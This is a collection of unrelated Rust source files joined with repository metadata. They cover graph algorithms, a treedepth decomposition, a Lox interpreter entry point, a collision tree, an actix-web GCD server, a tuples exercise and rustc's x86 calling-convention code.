            let mut stack = vec![(start, start, self.neighbors[start].iter())];
            while let Some((grandparent, parent, mut children)) = stack.pop() {
                // Find next child.
                let child = match children.next() {
                    Some(&v) => v,
                    None => {
                        // parent's subtree is exhausted: close it out.
                        if stack.len() > 1 {
                            // grandparent separates parent's subtree from the
                            // rest iff no back edge escapes above grandparent.
                            if low[&parent] >= discovery[&grandparent] {
                                if compute_components {
                                    //eprintln!("suche {:?} in {:?}", (grandparent,parent), edge_stack);
                                    let ind = edge_stack.iter().position(|&elem| elem == (grandparent, parent)).unwrap();
                                    let suffix = edge_stack.split_off(ind);
                                    //eprintln!("split in {:?} und {:?}", edge_stack, suffix);
                                    components.push(suffix);
                                }
                                articulation.push(grandparent);
                            }
                            if low[&parent] < low[&grandparent] {
                                low.insert(grandparent, low[&parent]);
                            }
                        } else if stack.len() == 1 { // length 1 so grandparent is root
                            root_children += 1;
                            if compute_components {
                                let ind = edge_stack.iter().position(|&elem| elem == (grandparent, parent)).unwrap();
                                components.push(edge_stack[ind..].to_vec());
                            }
                        }
                        continue;
                    }
                };
                // Put iterator back to the stack.
                stack.push((grandparent, parent, children));
                if grandparent == child {
                    continue;
                }
                if visited.contains(&child) {
                    if discovery[&child] <= discovery[&parent] { // back edge
                        if discovery[&child] < low[&parent] {
                            low.insert(parent, discovery[&child]);
                        }
                        if compute_components {
                            //eprintln!("push {:?}", (parent, child));
                            edge_stack.push((parent, child));
                        }
                    }
                } else {
                    // Tree edge: discover `child` with the next timestamp.
                    low.insert(child, discovery.len());
                    discovery.insert(child, discovery.len());
                    visited.insert(child);
                    stack.push((parent, child, self.neighbors[child].iter()));
                    if compute_components {
                        //eprintln!("push {:?}", (parent, child));
                        edge_stack.push((parent, child));
                    }
                }
            }
            // The root is an articulation point iff it has > 1 DFS child.
            if root_children > 1 {
                articulation.push(start);
            }
        }
        (articulation, components)
    }
}
/// Treedepth decomposition under construction: `parent[v]` is v's parent in
/// the decomposition tree once assigned; `orig_g` is a private copy of the
/// input graph.
pub struct Decomposition {
    pub parent: Vec<Option<usize>>, // parent of each vertex in the treedepth decomposition (if set yet)
    pub orig_g: Graph,
}
impl Decomposition {
/// Allocate memory for a graph with n vertices.
///
pub fn new(g: &Graph) -> Decomposition {
let orig_g = g.myclone();
Decomposition{
parent: vec![None; g.n],
orig_g,
}
}
    /// Computes the depth of the tree stored in self.parent via path-compression.
    /// This operation takes time O(n) and does not modify the graph.
    ///
    pub fn get_depth(&self) -> usize {
        let n = self.parent.len();
        let mut s = Vec::with_capacity(n); // take clean copy of pointer structure
        for v in 0..n { // path-compression will modify this structure
            // A vertex without a parent points to itself (it is a root).
            let p = match self.parent[v] {
                Some(p) => p,
                None => v
            };
            s.insert(v,p);
        }
        // NOTE(review): depths start at 2 (the root counts as depth 2) —
        // confirm this matches the expected output convention.
        let mut depth = vec![2; n];
        let mut stack = Vec::with_capacity(n);
        for mut v in 0..n { // for every vertex v of the tree we do once:
            while v != s[v] { // (i) crawl up the tree to find the root of v
                stack.push(v);
                v = s[v];
            }
            stack.pop();
            while let Some(w) = stack.pop() { // (ii) crawl down to compress the path and
                depth[w] = depth[s[w]] + 1; // to compute the depth
                s[w] = v;
            }
        }
        // done
        return *depth.iter().max().unwrap(); // maximum depth of any vertex is depth of the tree
    }
    /// Finds maximal subtrees of the decomposition tree T whose vertex sets
    /// also induce trees in the original graph. Returns (subtree root,
    /// subtree vertices) for every such subtree with more than two vertices.
    pub fn subtrees(&self) -> Vec<(usize, Vec<usize>)> {
        let n = self.parent.len();
        // Compute children in decomposition tree T.
        let mut children = vec![Vec::new(); n];
        let mut child_cnt = vec![0; n];
        let mut root = 0;
        for v in 0..n {
            if let Some(w) = self.parent[v] {
                children[w].push(v);
                child_cnt[w] += 1;
            } else {
                root = v;
            }
        }
        // Build stack with children on top, and parents somewhere below.
        // Hence, for each node the children have been processed before the node
        // is popped.
        let mut children_first_stack = vec![root];
        {
            let mut helper_queue = VecDeque::new();
            helper_queue.push_back(root);
            while let Some(v) = helper_queue.pop_front() {
                for &w in children[v].iter() {
                    helper_queue.push_back(w);
                    children_first_stack.push(w);
                }
            }
        }
        // Compute, which subtrees of T induce a tree in G.
        let mut is_tree = vec![false; n];
        while let Some(v) = children_first_stack.pop() {
            // Leaves trivially induce trees.
            if children[v].len() == 0 {
                is_tree[v] = true;
                continue;
            }
            let mut maybe_tree = true;
            for &w in children[v].iter() {
                if is_tree[w] == false {
                    maybe_tree = false;
                    break;
                }
            }
            if !maybe_tree { continue };
            // From now on, all children in this subtree of T are marked to be a tree.
            // All parents still are not marked as tree. Thus, is_tree can be used
            // as "visited" indicator.
            let mut cnt = 0;
            for &w in self.orig_g.neighbors[v].iter() {
                if is_tree[w] == true {
                    cnt += 1;
                }
            }
            // v joins the tree iff its only G-edges into the marked region
            // go to its own T-children (no extra edge would close a cycle).
            if cnt == children[v].len() {
                is_tree[v] = true;
            }
        }
        // Find subtree roots in T, that induce a tree in G.
        let mut subtree_roots = vec![];
        for v in 0..n {
            if children[v].len() == 0 { continue; } // No leafs of T as subtree root.
            match self.parent[v] {
                None => if is_tree[v] { subtree_roots.push(v) },
                Some(p) => if is_tree[v] && !is_tree[p] { subtree_roots.push(v) },
            }
        }
        //eprintln!("{:?}", subtree_roots);
        let mut subtrees = vec![];
        for &st_root in subtree_roots.iter() {
            // Collect the whole subtree of T under st_root.
            let mut subtree = vec![st_root];
            let mut stack = vec![st_root];
            while let Some(v) = stack.pop() {
                for &w in children[v].iter() {
                    stack.push(w);
                    subtree.push(w);
                }
            }
            //eprintln!("subtree with root {} is {:?}", st_root, subtree);
            if subtree.len() > 2 {
                subtrees.push((st_root, subtree));
            }
        }
        //eprintln!("{:?}", subtrees);
        subtrees
    }
}
/// Bipartite view of a graph: the vertex set is split into left/right
/// sides, and `neighbors` keeps only the cross edges (built in `new`).
pub struct Bipgraph {
    pub set_left: HashSet<usize>,
    pub set_right: HashSet<usize>,
    pub neighbors: HashMap<usize, Vec<usize>>,
}
impl Bipgraph {
    /// Builds the bipartite subgraph of `g` induced by `left` and `right`:
    /// for every vertex, only neighbors on the opposite side are kept.
    pub fn new(g: &Graph, left: &[usize], right: &[usize]) -> Bipgraph {
        let set_left: HashSet<usize> = left.iter().cloned().collect();
        let set_right: HashSet<usize> = right.iter().cloned().collect();
        let mut neighbors: HashMap<usize, Vec<usize>> = HashMap::new();
        for &u in left {
            neighbors.insert(u, g.neighbors[u].iter().filter(|&v| set_right.contains(v)).cloned().collect());
        }
        for &u in right {
            neighbors.insert(u, g.neighbors[u].iter().filter(|&v| set_left.contains(v)).cloned().collect());
        }
        Bipgraph {
            set_left,
            set_right,
            neighbors,
        }
    }
    //fn neighbors(&self, u: usize) -> impl Iterator<Item = &usize> {
    /// Neighbors of `u` on the opposite side (precomputed in `new`).
    /// Panics if `u` was not part of `left`/`right` at construction time.
    pub fn neighbors(&self, u: usize) -> &Vec<usize> {
        //self.g.neighbors[u].iter().filter(|&v| self.is_left[u] ^ self.is_left[*v])
        //self.g.neighbors[u].iter().filter(|&v| (self.is_left[u] && self.is_right[*v]) || (self.is_right[u] && self.is_left[*v])).collect()
        &self.neighbors[&u]
    }
}
/// Selection strategy: take the first, the last, or a random candidate.
// NOTE(review): consumers are not visible in this file — confirm semantics.
#[derive(Debug)]
pub enum PickStrategy {
    First,
    Last,
    Random
}
| true |
8b85b7ccdb4f6f8e5895fb875f560b2921ac3074
|
Rust
|
sria91-rlox/rlox-6
|
/interpreter/src/main.rs
|
UTF-8
| 3,140 | 3.21875 | 3 |
[] |
no_license
|
mod token;
mod scanner;
mod parser;
mod interpreter;
mod environment;
use std::{env, sync::Mutex};
use std::process;
use std::io;
use std::fs;
use std::sync::atomic::{AtomicBool, Ordering};
use interpreter::{Interpreter, RuntimeError};
use token::{Token, TokenType};
use scanner::Scanner;
use parser::{ParseError, Parser};
use lazy_static::lazy_static;
fn main() {
    // NOTE(review): this local flag duplicates the global HAD_ERROR state
    // and is never set to true anywhere in this file — see `Lox::run`.
    let mut lox = Lox{
        had_error: false
    };
    lox.main();
}
// Global error flags shared across the interpreter: set by `Lox::report` /
// `Lox::runtime_error`, read after running a file to pick the exit code.
static HAD_ERROR: AtomicBool = AtomicBool::new(false);
static HAD_RUNTIME_ERROR: AtomicBool = AtomicBool::new(false);
// Single shared tree-walk interpreter, guarded by a mutex.
lazy_static! {
    static ref INTERPRETER: Mutex<Interpreter> = Mutex::new(Interpreter::new());
}
struct Lox {
    // NOTE(review): never set to true anywhere in this file; see `Lox::run`.
    had_error: bool
}
impl Lox {
    /// Entry point: currently always starts the REPL, ignoring arguments.
    fn main(&mut self) {
        let _args_: Vec<String> = env::args().collect();
        self.run_prompt();
        // NOTE(review): the commented-out dispatch below indexes args[0]
        // (the program name) and treats len == 1 as "script given" — both
        // look wrong; revisit before re-enabling.
        // if args.len() > 1 {
        //     println!("Usage: rlox [script]");
        //     process::exit(64);
        // } else if args.len() == 1 {
        //     self.run_file(&args[0]).unwrap();
        // } else {
        //     self.run_prompt();
        // }
    }
    /// Runs a script file to completion, then terminates the process with a
    /// nonzero code if any static or runtime error was flagged.
    fn _run_file(&self, path: &str) -> io::Result<()> {
        let bytes = fs::read(path).unwrap();
        let string = std::str::from_utf8(&bytes).unwrap().to_owned();
        self.run(string);
        // NOTE(review): Crafting Interpreters exits with 65 for static
        // errors; 64 conventionally means "usage error" — confirm intent.
        if HAD_ERROR.load(Ordering::Relaxed) == true {
            process::exit(64);
        }
        if HAD_RUNTIME_ERROR.load(Ordering::Relaxed) == true {
            process::exit(70);
        }
        Ok(())
    }
    /// Interactive REPL: reads lines from stdin until EOF and runs each.
    fn run_prompt(&mut self) {
        loop {
            println!("> ");
            let mut line = String::new();
            io::stdin().read_line(&mut line).unwrap();
            // read_line leaves the buffer empty only at EOF; any real input
            // contains at least the trailing newline.
            if line.len() == 0 {
                break;
            }
            self.run(line);
            self.had_error = false; // reset after every loop. if a user makes a mistake, it shouldn't kill their entire session.
        }
    }
    /// Scans, parses and interprets one chunk of source code.
    fn run(&self, source: String) {
        let mut scanner = Scanner::new(source);
        let tokens: Vec<Token> = scanner.scan_tokens();
        let mut parser = Parser::new(tokens);
        let stmts = parser.parse();
        // NOTE(review): `self.had_error` is never set to true anywhere in
        // this file — errors raise the global HAD_ERROR instead — so this
        // guard looks dead; confirm whether it should read HAD_ERROR.
        if self.had_error {
            return;
        }
        let mut i = INTERPRETER.lock().unwrap();
        i.interpret(stmts);
    }
    /// Reports a scanner-level error at `line`.
    fn error(line: u32, message: String) {
        Lox::report(line, "".to_owned(), message);
    }
    /// Formats a parser error, pointing at EOF or at the offending lexeme.
    fn parse_error(error: ParseError) {
        let ParseError(token, message) = error;
        if token.token_type == TokenType::Eof {
            Lox::report(token.line, "at end".to_owned(), message)
        } else {
            Lox::report(token.line, format!("at, {}", token.lexeme), message)
        }
    }
    /// Prints a runtime error and raises the global runtime-error flag.
    fn runtime_error(error: RuntimeError) {
        let RuntimeError(token, message) = error;
        println!("{} \n[line {}]", message, token.line);
        HAD_RUNTIME_ERROR.store(true, Ordering::Relaxed);
    }
    /// Prints a located error message and raises the global error flag.
    fn report(line: u32, where_: String, message: String) {
        println!("[line {}] Error {}: {}", line, where_, message);
        HAD_ERROR.store(true, Ordering::Relaxed);
    }
}
| true |
9d7ae7eb167206752e9f220ac4b77625f27f6f74
|
Rust
|
Aedius/horfimbor
|
/server/src/domain.rs
|
UTF-8
| 701 | 3.03125 | 3 |
[
"MIT"
] |
permissive
|
use crate::error::InvalidResources;
use serde::{Deserialize, Serialize};
/// Resource pool; the three quantities always sum to 100000
/// (enforced by `Resources::new`).
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub struct Resources {
    uranium: usize,
    steel: usize,
    gold: usize,
}
/// Building counts for a settlement.
// NOTE(review): no constructor or consumer is visible in this file.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub struct Buildings {
    house: usize,
    mine: usize,
}
impl Resources {
    /// Creates a resource pool holding exactly 100000 units in total.
    ///
    /// `gold` is whatever remains after `uranium` and `steel` are allocated.
    /// Returns `InvalidResources` when the two inputs exceed the budget —
    /// including the case where their sum would overflow `usize`.
    pub fn new(uranium: usize, steel: usize) -> Result<Resources, InvalidResources> {
        // checked_add: the original `uranium + steel` could overflow and
        // panic in debug builds or wrap to a bogus small value in release.
        let allocated = uranium.checked_add(steel).ok_or(InvalidResources)?;
        if allocated > 100000 {
            Err(InvalidResources)
        } else {
            Ok(Resources {
                uranium,
                steel,
                gold: 100000 - allocated,
            })
        }
    }
}
| true |
b7738b30720766392224ed12eb234afd52716e0c
|
Rust
|
storyfeet/collide_tree
|
/src/lib.rs
|
UTF-8
| 2,902 | 3.28125 | 3 |
[] |
no_license
|
use std::fmt::Debug;
use std::ops::*;
pub mod boxes;
#[cfg(test)]
mod test;
/// A splittable bounding volume used by the collision tree.
pub trait BoundBox: Sized + Clone {
    ///Split the box in half somehow, normally this should vary in direction
    fn split(&self) -> (Self, Self);
    ///Test if one box collides with another.
    fn hits(&self, b: &Self) -> bool;
}
/// An item storable in the tree: it has an id (reported on collisions)
/// and a bounding box.
pub trait Located {
    /// Identifier type reported in collision pairs.
    type ID;
    /// Bounding-box type used for overlap tests.
    type Box: BoundBox;
    fn id(&self) -> Self::ID;
    fn bounds(&self) -> Self::Box;
}
/// A node of the collision tree. Items that straddle the split line stay in
/// `top`; the others sink into one of the two children (built lazily).
pub struct LocalTree<L: Located + Debug> {
    bound: L::Box,
    top: Vec<L>,
    children: Option<Box<(LocalTree<L>, LocalTree<L>)>>,
}
impl<L: Located + Debug> LocalTree<L> {
pub fn new(bound: L::Box) -> Self {
LocalTree {
bound,
top: Vec::new(),
children: None,
}
}
    /// Inserts `item`, appending every collision it causes to `v`
    /// (existing item's id first, new item's id second).
    pub fn add_item(&mut self, item: L, v: &mut Vec<(L::ID, L::ID)>) {
        self.grow_children();
        let ib = item.bounds();
        // Items held at this level are checked directly.
        for t in &self.top {
            if t.bounds().hits(&ib) {
                v.push((t.id(), item.id()));
            }
        }
        match &mut self.children {
            Some(b) => {
                let (l, r) = b.deref_mut();
                match (l.bound.hits(&ib), r.bound.hits(&ib)) {
                    // Fits entirely in one half: recurse there.
                    (true, false) => l.add_item(item, v),
                    (false, true) => r.add_item(item, v),
                    // Straddles the split: collect hits from both subtrees
                    // and keep the item at this level.
                    _ => {
                        l.check_hits(&item, v);
                        r.check_hits(&item, v);
                        self.top.push(item);
                    }
                }
            }
            None => self.top.push(item),
        }
    }
    /// Records (into `v`) all collisions between `item` and items stored in
    /// this subtree, without inserting `item`.
    pub fn check_hits(&self, item: &L, v: &mut Vec<(L::ID, L::ID)>) {
        let ib = item.bounds();
        for t in &self.top {
            if t.bounds().hits(&ib) {
                v.push((t.id(), item.id()));
            }
        }
        if let Some(b) = &self.children {
            let (l, r) = b.deref();
            // Only descend into halves the item actually overlaps.
            if l.bound.hits(&ib) {
                l.check_hits(item, v);
            }
            if r.bound.hits(&ib) {
                r.check_hits(item, v);
            }
        }
    }
pub fn grow_children(&mut self) {
if let Some(_) = self.children {
return;
}
if self.top.len() < 8 {
return;
}
let (l, r) = self.bound.split();
let (mut l, mut r) = (Self::new(l), Self::new(r));
let mut newtop = Vec::new();
std::mem::swap(&mut newtop, &mut self.top);
for v in newtop {
let ib = v.bounds();
match (l.bound.hits(&ib), r.bound.hits(&ib)) {
(true, false) => l.top.push(v),
(false, true) => r.top.push(v),
_ => self.top.push(v),
}
}
self.children = Some(Box::new((l, r)));
}
}
// Inline smoke test; the substantive tests live in the `test` module
// declared near the top of this file.
#[cfg(test)]
mod tests {
    #[test]
    fn it_works() {
        assert_eq!(2 + 2, 4);
    }
}
| true |
fe28086fff462b5078491e616c5d141452aa0cf5
|
Rust
|
oil-lang/oil-rs
|
/shared/src/asset.rs
|
UTF-8
| 2,182 | 3.1875 | 3 |
[
"MIT"
] |
permissive
|
use std::fmt::{self, Debug};
use std::path::Path;
use deps::Constructor;
use resource::{BasicResourceManager, ResourceId};
/// Placeholder for font resources (loading not implemented yet; see
/// `FontData::new`).
#[derive(Debug, Clone)]
pub struct FontData;
// TODO handle shared images somehow
// even in a disgusting way, but something !
// The opengl backend will do it by using the same texture id.
/// A sub-rectangle (offset + size, in pixels) of a loaded texture,
/// identified by its resource id.
#[derive(Clone)]
pub struct ImageData {
    pub img: ResourceId,
    pub offset_x: f32,
    pub offset_y: f32,
    pub width: f32,
    pub height: f32,
}
/// Necessary because DynamicImage does not implement the trait Debug.
impl Debug for ImageData
{
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
try!(write!(f, "ImageData {{ "));
try!(write!(f, "offset_x {:?}, ", self.offset_x));
try!(write!(f, "offset_y {:?}, ", self.offset_y));
try!(write!(f, "width {:?}, ", self.width));
try!(write!(f, "height {:?} ", self.height));
write!(f, "}}")
}
}
impl ImageData {
    /// Builds an `ImageData` from a `Constructor::Image`, loading the
    /// texture through `resource_manager`.
    ///
    /// Missing width/height default to the image's full dimensions; missing
    /// offsets default to zero. Panics on any other `Constructor` variant.
    pub fn new<R>(
        image_ctor: &Constructor,
        resource_manager: &mut R)
        -> ImageData
        where R: BasicResourceManager
    {
        if let Constructor::Image(ref path, width, height, offset_x, offset_y)
            = *image_ctor
        {
            let image = resource_manager.get_texture_id(&Path::new(path));
            let (iw, ih) = resource_manager.get_image_dimensions(image);
            let w = width.unwrap_or(iw as f32);
            let h = height.unwrap_or(ih as f32);
            let x = offset_x.unwrap_or(0f32);
            let y = offset_y.unwrap_or(0f32);
            ImageData {
                img: image,
                offset_x: x,
                offset_y: y,
                width: w,
                height: h,
            }
        } else {
            panic!("Wrong constructor passed. Expected Constructor::Image.");
        }
    }
}
impl FontData {
    /// Builds a `FontData` from a `Constructor::Font`.
    ///
    /// The path/width/height payload is currently ignored (font loading is
    /// unimplemented). Panics on any other `Constructor` variant.
    pub fn new(font_ctor: &Constructor) -> FontData {
        if let Constructor::Font(ref path, width, height) = *font_ctor {
            // TODO: see freetype-rs or something similar
            FontData
        } else {
            panic!("Wrong constructor passed. Expected Constructor::Font.");
        }
    }
}
| true |
7fb07a318ae4cad2c45d085f90202e980249c2d2
|
Rust
|
timmyjose-study/programming-rust-2nd-edition
|
/chapter2/actix-gcd/src/main.rs
|
UTF-8
| 1,361 | 3.15625 | 3 |
[] |
no_license
|
use actix_gcd;
use actix_web::{web, App, HttpResponse, HttpServer};
use serde::Deserialize;
/// Form fields posted from the index page.
#[derive(Deserialize)]
struct GcdParameters {
    m: u64,
    n: u64,
}
/// Starts the HTTP server on localhost:3000 with the two routes
/// (GET / for the form, POST /gcd for the computation).
fn main() {
    let server = HttpServer::new(|| {
        App::new()
            .route("/", web::get().to(get_index))
            .route("/gcd", web::post().to(post_gcd))
    });
    println!("Serving on localhost:3000...");
    server
        .bind("127.0.0.1:3000")
        .expect("error binding on localhost:3000")
        .run()
        .expect("error while running server");
}
/// GET / — serves the static HTML form for entering `m` and `n`.
fn get_index() -> HttpResponse {
    HttpResponse::Ok().content_type("text/html").body(
        r#"
        <title>GCD calculator</title>
        <form action="/gcd" method="post">
        <input type="text" name="m"/>
        <input type="text" name="n"/>
        <button type="submit">Compute GCD</button>
        </form>
    "#,
    )
}
/// POST /gcd — validates the form values and renders the result page.
fn post_gcd(form: web::Form<GcdParameters>) -> HttpResponse {
    // Euclid's algorithm is undefined for zero inputs; reject either.
    if form.m == 0 || form.n == 0 {
        return HttpResponse::BadRequest()
            .content_type("text/html")
            // Fixed: the guard fires when *either* value is zero, but the
            // old message claimed it only applied to "0 and 0".
            .body("GCD cannot be calculated when m or n is 0");
    }
    let response = format!(
        "The GCD of {} and {} is <b>{}</b>\n",
        form.m,
        form.n,
        actix_gcd::gcd(form.m, form.n)
    );
    HttpResponse::Ok().content_type("text/html").body(response)
}
| true |
e6d4f09a2adf6512b42df3809fd56cc9c29f5de3
|
Rust
|
manuel-rhdt/mlayout
|
/src/mathmlparser/error.rs
|
UTF-8
| 3,525 | 2.984375 | 3 |
[
"MIT"
] |
permissive
|
use std;
use std::fmt;
use std::io::prelude::*;
#[cfg(feature = "mathml_parser")]
use quick_xml::{self, XmlReader};
/// Convenience alias: parsing operations all fail with `ParsingError`.
pub type Result<T> = std::result::Result<T, ParsingError>;
/// A parse failure, carrying the byte position in the input when known.
#[derive(Debug)]
pub struct ParsingError {
    pub position: Option<usize>,
    pub error_type: ErrorType,
}
impl ParsingError {
    /// Builds an `OtherError` tagged with the reader's current buffer position.
    #[cfg(feature = "mathml_parser")]
    pub fn from_string<B: BufRead, S: ToString>(parser: &XmlReader<B>, string: S) -> ParsingError {
        ParsingError {
            position: Some(parser.buffer_position()),
            error_type: ErrorType::OtherError(string.to_string()),
        }
    }
    /// Attaches the reader's current buffer position to `err_type`.
    #[cfg(feature = "mathml_parser")]
    pub fn of_type<B: BufRead>(parser: &XmlReader<B>, err_type: ErrorType) -> ParsingError {
        ParsingError {
            position: Some(parser.buffer_position()),
            error_type: err_type,
        }
    }
}
/// The different ways parsing can fail (see `Display` for the messages).
#[derive(Debug)]
pub enum ErrorType {
    UnknownElement(String),
    UnexpectedEndOfInput,
    WrongEndElement(String),
    OtherError(String),
    Utf8Error(std::str::Utf8Error),
    // Only present when the XML parser backend is compiled in.
    #[cfg(feature = "mathml_parser")]
    XmlError(quick_xml::error::Error),
}
impl fmt::Display for ParsingError {
    // Human-readable message per error kind; the stored `position` is not
    // included in the rendered text.
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        match self.error_type {
            ErrorType::Utf8Error(err) => write!(f, "{}", err),
            ErrorType::UnknownElement(ref name) => write!(f, "Unknown Element: \"{}\"", name),
            ErrorType::UnexpectedEndOfInput => write!(f, "Unexpected end of input."),
            ErrorType::WrongEndElement(ref name) => write!(
                f,
                "Unexpected end element \"<{}>\" without corresponding start element.",
                name
            ),
            ErrorType::OtherError(ref string) => write!(f, "Error: {}", string),
            #[cfg(feature = "mathml_parser")]
            ErrorType::XmlError(ref error) => write!(f, "XML error: {}", error),
        }
    }
}
impl std::error::Error for ParsingError {
    /// Exposes the underlying XML error (when present) as the error source.
    // `source` supersedes the deprecated `cause`; the default `cause`
    // implementation delegates to `source`, so existing callers of either
    // method keep working.
    fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
        match self.error_type {
            #[cfg(feature = "mathml_parser")]
            ErrorType::XmlError(ref error) => Some(error),
            _ => None,
        }
    }
}
impl<'a> ::std::convert::From<&'a str> for ParsingError {
fn from(string: &str) -> ParsingError {
ParsingError {
position: None,
error_type: ErrorType::OtherError(string.to_owned()),
}
}
}
/// Wraps an owned message as `OtherError` (no position info).
impl ::std::convert::From<String> for ParsingError {
    fn from(string: String) -> ParsingError {
        ParsingError {
            position: None,
            error_type: ErrorType::OtherError(string),
        }
    }
}
/// Wraps a raw XML error without position information.
#[cfg(feature = "mathml_parser")]
impl ::std::convert::From<quick_xml::error::Error> for ParsingError {
    fn from(error: quick_xml::error::Error) -> ParsingError {
        ParsingError {
            position: None,
            error_type: ErrorType::XmlError(error),
        }
    }
}
/// Wraps an XML error together with its buffer position.
#[cfg(feature = "mathml_parser")]
impl ::std::convert::From<(quick_xml::error::Error, usize)> for ParsingError {
    fn from((error, position): (quick_xml::error::Error, usize)) -> ParsingError {
        ParsingError {
            position: Some(position),
            error_type: ErrorType::XmlError(error),
        }
    }
}
/// Wraps a UTF-8 decoding failure (no position info).
impl ::std::convert::From<std::str::Utf8Error> for ParsingError {
    fn from(error: std::str::Utf8Error) -> ParsingError {
        ParsingError {
            position: None,
            error_type: ErrorType::Utf8Error(error),
        }
    }
}
| true |
ef2972d2e3ce878ba2f2053b15d2a9f15c537762
|
Rust
|
xzfc/ufcs.rs
|
/src/lib.rs
|
UTF-8
| 137 | 2.59375 | 3 |
[
"MIT",
"Unlicense"
] |
permissive
|
#![no_std]
/// Universal pipe helper: lets any value be threaded through a closure,
/// e.g. `x.pipe(f).pipe(g)` instead of `g(f(x))`.
pub trait Pipe: Sized {
    /// Applies `f` to `self` and returns the result.
    fn pipe<R, F>(self, f: F) -> R
    where
        F: FnOnce(Self) -> R,
    {
        f(self)
    }
}
/// Every sized type gets `pipe` for free via this blanket impl.
impl<T> Pipe for T {}
| true |
057a71d35ea1d47a854539e642ed29f3cef68b4a
|
Rust
|
jamesrweb/rust-coursework
|
/05 - Tuples and Arrays/01 - Tuples/main.rs
|
UTF-8
| 520 | 3.265625 | 3 |
[] |
no_license
|
fn main() {
    // Tuple whose element types are inferred from the literals: (i32, bool, f64).
    let inferred = (220, true, 8.5);
    println!("{:?}", inferred);
    println!("Items by key:");
    println!("First item: {}", inferred.0);
    println!("Second item: {}", inferred.1);
    println!("Third item: {}", inferred.2);
    // Tuple with an explicit type annotation, then pulled apart by
    // destructuring instead of field access.
    let annotated: (i32, bool, f64) = (123, false, 22.1);
    let (a, b, c) = annotated;
    println!("Items by destructuring:");
    println!("First item: {}", a);
    println!("Second item: {}", b);
    println!("Third item: {}", c);
}
| true |
75b9f37158ecd8a6cfef7e0cd757376642fc4b4d
|
Rust
|
IThawk/rust-project
|
/rust-master/src/librustc_target/abi/call/x86.rs
|
UTF-8
| 4,540 | 2.640625 | 3 |
[
"MIT",
"LicenseRef-scancode-other-permissive",
"Apache-2.0",
"BSD-3-Clause",
"BSD-2-Clause",
"NCSA"
] |
permissive
|
use crate::abi::call::{ArgAttribute, FnType, PassMode, Reg, RegKind};
use crate::abi::{self, HasDataLayout, LayoutOf, TyLayout, TyLayoutMethods};
use crate::spec::HasTargetSpec;
/// Calling-convention flavor for 32-bit x86.
#[derive(PartialEq)]
pub enum Flavor {
    /// Default C convention: everything passed on the stack.
    General,
    /// `fastcall`: leading integer arguments may be promoted to registers.
    Fastcall
}
/// Returns `true` if `layout` is a single float scalar, possibly wrapped in
/// one or more single-field aggregates whose only field sits at offset 0.
fn is_single_fp_element<'a, Ty, C>(cx: &C, layout: TyLayout<'a, Ty>) -> bool
    where Ty: TyLayoutMethods<'a, C> + Copy,
          C: LayoutOf<Ty = Ty, TyLayout = TyLayout<'a, Ty>> + HasDataLayout
{
    match layout.abi {
        abi::Abi::Scalar(ref scalar) => scalar.value.is_float(),
        abi::Abi::Aggregate { .. } => {
            // Recurse through newtype-like wrappers: exactly one field,
            // located at the very start of the aggregate.
            if layout.fields.count() == 1 && layout.fields.offset(0).bytes() == 0 {
                is_single_fp_element(cx, layout.field(cx, 0))
            } else {
                false
            }
        }
        _ => false
    }
}
/// Classify the return value and arguments of `fty` for the 32-bit x86 ABI,
/// optionally applying `fastcall`'s in-register argument promotion.
pub fn compute_abi_info<'a, Ty, C>(cx: &C, fty: &mut FnType<'a, Ty>, flavor: Flavor)
    where Ty: TyLayoutMethods<'a, C> + Copy,
          C: LayoutOf<Ty = Ty, TyLayout = TyLayout<'a, Ty>> + HasDataLayout + HasTargetSpec
{
    if !fty.ret.is_ignore() {
        if fty.ret.layout.is_aggregate() {
            // Returning a structure. Most often, this will use
            // a hidden first argument. On some platforms, though,
            // small structs are returned as integers.
            //
            // Some links:
            // http://www.angelcode.com/dev/callconv/callconv.html
            // Clang's ABI handling is in lib/CodeGen/TargetInfo.cpp
            let t = cx.target_spec();
            if t.options.abi_return_struct_as_int {
                // According to Clang, everyone but MSVC returns single-element
                // float aggregates directly in a floating-point register.
                if !t.options.is_like_msvc && is_single_fp_element(cx, fty.ret.layout) {
                    match fty.ret.layout.size.bytes() {
                        4 => fty.ret.cast_to(Reg::f32()),
                        8 => fty.ret.cast_to(Reg::f64()),
                        _ => fty.ret.make_indirect()
                    }
                } else {
                    // Small non-float aggregates are returned as integers of
                    // the matching width; anything larger goes indirect.
                    match fty.ret.layout.size.bytes() {
                        1 => fty.ret.cast_to(Reg::i8()),
                        2 => fty.ret.cast_to(Reg::i16()),
                        4 => fty.ret.cast_to(Reg::i32()),
                        8 => fty.ret.cast_to(Reg::i64()),
                        _ => fty.ret.make_indirect()
                    }
                }
            } else {
                fty.ret.make_indirect();
            }
        } else {
            // Scalar returns: widen small integers up to 32 bits.
            fty.ret.extend_integer_width_to(32);
        }
    }
    for arg in &mut fty.args {
        if arg.is_ignore() { continue; }
        if arg.layout.is_aggregate() {
            // Aggregates are passed on the stack (byval pointer).
            arg.make_indirect_byval();
        } else {
            arg.extend_integer_width_to(32);
        }
    }
    if flavor == Flavor::Fastcall {
        // Mark arguments as InReg like clang does it,
        // so our fastcall is compatible with C/C++ fastcall.
        // Clang reference: lib/CodeGen/TargetInfo.cpp
        // See X86_32ABIInfo::shouldPrimitiveUseInReg(), X86_32ABIInfo::updateFreeRegs()
        // IsSoftFloatABI is only set to true on ARM platforms,
        // which in turn can't be x86?
        // Two integer registers are available for fastcall arguments.
        let mut free_regs = 2;
        for arg in &mut fty.args {
            let attrs = match arg.mode {
                PassMode::Ignore |
                PassMode::Indirect(_, None) => continue,
                PassMode::Direct(ref mut attrs) => attrs,
                PassMode::Pair(..) |
                PassMode::Indirect(_, Some(_)) |
                PassMode::Cast(_) => {
                    unreachable!("x86 shouldn't be passing arguments by {:?}", arg.mode)
                }
            };
            // At this point we know this must be a primitive of sorts.
            let unit = arg.layout.homogeneous_aggregate(cx).unit().unwrap();
            assert_eq!(unit.size, arg.layout.size);
            if unit.kind == RegKind::Float {
                continue;
            }
            let size_in_regs = (arg.layout.size.bits() + 31) / 32;
            if size_in_regs == 0 {
                continue;
            }
            if size_in_regs > free_regs {
                break;
            }
            free_regs -= size_in_regs;
            if arg.layout.size.bits() <= 32 && unit.kind == RegKind::Integer {
                attrs.set(ArgAttribute::InReg);
            }
            if free_regs == 0 {
                break;
            }
        }
    }
